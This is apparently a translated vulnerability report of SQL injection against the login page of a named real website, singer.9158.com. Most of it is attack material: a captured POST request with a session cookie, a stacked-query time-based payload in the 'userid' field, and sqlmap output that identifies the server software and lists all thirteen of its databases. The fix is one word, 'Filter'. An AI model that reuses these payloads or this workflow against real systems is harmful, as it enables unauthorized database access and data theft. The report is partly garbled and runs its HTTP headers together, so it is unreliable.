9158 SQL Injection on a website

9158 SQL Injection on a website

Heaven and Earth are insensitive to all things

POST Data Packet:

POST/login. aspx HTTP/1.1

Host: singer.9158.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://singer.9158.com/Cookie: ASP.NET_SessionId=3chgwu45soqh11fxloigko45X-Forwarded-For: 8.8.8.8'Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 281__VIEWSTATE=%2FwEPDwUKLTU5OTI5MDA4MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMSnrtngDOPw6MUqDuuzz8nqygUpv&userid=admin&pwd=admin&yazhengma=hgop&ImageButton1.x=50&ImageButton1.y=11&__EVENTVALIDATION=%2FwEWAwL2hPTXDQLr94HeAgLSwpnTCCyMTjibN10ybcZ4dhPkX08qBWoJ

The parameter userid is not filtered out for 13 databases (for details about the parameters, refer to and proof of vulnerability)


 

 

 

POST parameter 'userid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 1041 HTTP(s) requests:---Parameter: userid (POST)    Type: stacked queries    Title: Microsoft SQL Server/Sybase stacked queries (comment)    Payload: __VIEWSTATE=/wEPDwUKLTU5OTI5MDA4MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMSnrtngDOPw6MUqDuuzz8nqygUpv&userid=admin';WAITFOR DELAY '0:0:20'--&pwd=admin&yazhengma=hgop&ImageButton1.x=50&ImageButton1.y=11&__EVENTVALIDATION=/wEWAwL2hPTXDQLr94HeAgLSwpnTCCyMTjibN10ybcZ4dhPkX08qBWoJ---[14:30:58] [INFO] testing Microsoft SQL Server[14:30:58] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[14:31:18] [INFO] confirming Microsoft SQL Server[14:32:20] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[14:32:20] [INFO] fetching database names[14:32:20] [INFO] fetching number of databases[14:32:20] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[14:32:20] [INFO] retrieved:[14:32:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[14:32:21] [ERROR] unable to retrieve the number of databases[14:32:21] [INFO] retrieved: TianGe[14:39:22] [INFO] retrieved: master[14:47:02] [INFO] retrieved: tempdb[14:55:41] [INFO] retrieved: model[15:03:27] [INFO] retrieved: msdb[15:08:41] [INFO] retrieved:[15:09:44] [ERROR] invalid character detected. retrying..Repor[15:19:30] [ERROR] invalid character detected. retrying..[15:20:32] [ERROR] invalid character detected. retrying..tServer[15:30:30] [INFO] retrieved: ReportServerTempDB[15:55:11] [INFO] retrieved: SEND_MAIL[16:04:44] [INFO] retrieved: TianGe[16:11:44] [INFO] retrieved: IP_Stat[16:21:07] [INFO] retrieved: TianGe_History[16:40:12] [INFO] retrieved: CarNew[16:47:12] [INFO] retrieved: CarSport[16:58:03] [INFO] retrieved: DBA_Monitor[17:12:36] [INFO] retrieved:available databases [13]:[*] CarNew[*] CarSport[*] DBA_Monitor[*] IP_Stat[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] SEND_MAIL[*] tempdb[*] TianGe[*] TianGe_History

 

Solution:

Filter